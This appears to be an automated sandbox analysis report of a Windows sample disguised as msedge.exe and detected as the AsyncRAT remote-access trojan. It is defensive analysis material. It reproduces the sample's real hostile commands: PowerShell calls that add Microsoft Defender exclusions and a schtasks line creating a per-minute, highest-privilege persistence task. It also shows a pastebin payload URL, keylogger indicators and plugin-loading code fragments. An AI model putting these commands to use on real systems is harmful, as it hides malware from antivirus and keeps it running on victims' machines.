                    Source: powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000002.00000002.2203968122.0000020A19881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2294712290.0000016F10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2445383429.0000026C1B7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
                    Source: msedge.exe, 00000000.00000002.3362810960.00000000028D1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://pastebin.com
                    Source: msedge.exe, 00000015.00000002.3313838372.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://pastebin.com/raw/RPPi3ByL
                    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknown; Network traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknown; Network traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknown; HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49720 version: TLS 1.2
                    Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49721 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: msedge.exe, XLogger.cs; .Net Code: KeyboardLayout
                    Source: msedge.exe.0.dr, XLogger.cs; .Net Code: KeyboardLayout

                    Operating System Destruction

                    Source: C:\Users\user\Desktop\msedge.exe; Process information set: 01 00 00 00

                    System Summary

                    Source: msedge.exe, type: SAMPLE; Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.0.msedge.exe.590000.0.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED; Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: msedge.exe, 00000000.00000002.3356950165.0000000000A8C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs msedge.exe
                    Source: msedge.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: msedge.exe, type: SAMPLE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.0.msedge.exe.590000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: msedge.exe, Helper.cs; Cryptographic APIs: 'TransformFinalBlock'
                    Source: msedge.exe, AlgorithmAES.cs; Cryptographic APIs: 'TransformFinalBlock'
                    Source: msedge.exe.0.dr, Helper.cs; Cryptographic APIs: 'TransformFinalBlock'
                    Source: msedge.exe.0.dr, AlgorithmAES.cs; Cryptographic APIs: 'TransformFinalBlock'
                    Source: msedge.exe.0.dr, ClientSocket.cs; Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: msedge.exe.0.dr, ClientSocket.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: msedge.exe, ClientSocket.cs; Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: msedge.exe, ClientSocket.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@20/21@2/3
                    Source: C:\Users\user\Desktop\msedge.exe; File created: C:\Users\user\AppData\Local\msedge.exe
                    Source: C:\Users\user\AppData\Local\msedge.exe; Mutant created: NULL
                    Source: C:\Users\user\Desktop\msedge.exe; Mutant created: \Sessions\1\BaseNamedObjects\OnCH8EVI1tYADuXo
                    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:964:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2404:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3392:120:WilError_03
                    Source: C:\Users\user\Desktop\msedge.exe; File created: C:\Users\user\AppData\Local\Temp\Log.tmp
                    Source: msedge.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: msedge.exe; Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\msedge.exe; File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\msedge.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: msedge.exe; Virustotal: Detection: 65%
                    Source: C:\Users\user\Desktop\msedge.exe; File read: C:\Users\user\Desktop\msedge.exe
                    Source: unknown; Process created: C:\Users\user\Desktop\msedge.exe "C:\Users\user\Desktop\msedge.exe"
                    Source: C:\Users\user\Desktop\msedge.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\msedge.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\msedge.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\msedge.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\msedge.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\msedge.exe; Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"
                    Source: C:\Windows\System32\schtasks.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown; Process created: C:\Users\user\AppData\Local\msedge.exe C:\Users\user\AppData\Local\msedge.exe
                    Source: unknown; Process created: C:\Users\user\AppData\Local\msedge.exe "C:\Users\user\AppData\Local\msedge.exe"
                    Source: unknown; Process created: C:\Users\user\AppData\Local\msedge.exe "C:\Users\user\AppData\Local\msedge.exe"
                    Source: unknown; Process created: C:\Users\user\AppData\Local\msedge.exe C:\Users\user\AppData\Local\msedge.exe
                    Source: C:\Users\user\Desktop\msedge.exe; Sections loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, sxs.dll, mpr.dll, scrrun.dll, linkinfo.dll, ntshrui.dll, cscapi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, wbemcomn.dll, amsi.dll, avicap32.dll, msvfw32.dll, winmm.dll, windowscodecs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Sections loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\msedge.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\msedge.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
                    Source: msedge.lnk.0.dr | LNK file: ..\..\..\..\..\..\Local\msedge.exe
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: msedge.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: msedge.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: msedge.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: msedge.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: msedge.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: msedge.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: msedge.exe, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
                    Source: msedge.exe, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
                    Source: msedge.exe, Messages.cs | .Net Code: Memory
                    Source: msedge.exe.0.dr, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
                    Source: msedge.exe.0.dr, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
                    Source: msedge.exe.0.dr, Messages.cs | .Net Code: Memory
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3454D2A5 pushad ; iretd 2_2_00007FFD3454D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34665F0F push ebx; ret 2_2_00007FFD34665F12
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34732316 push 8B485F94h; iretd 2_2_00007FFD3473231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD3453D2A5 pushad ; iretd 5_2_00007FFD3453D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD34722316 push 8B485F95h; iretd 5_2_00007FFD3472231B
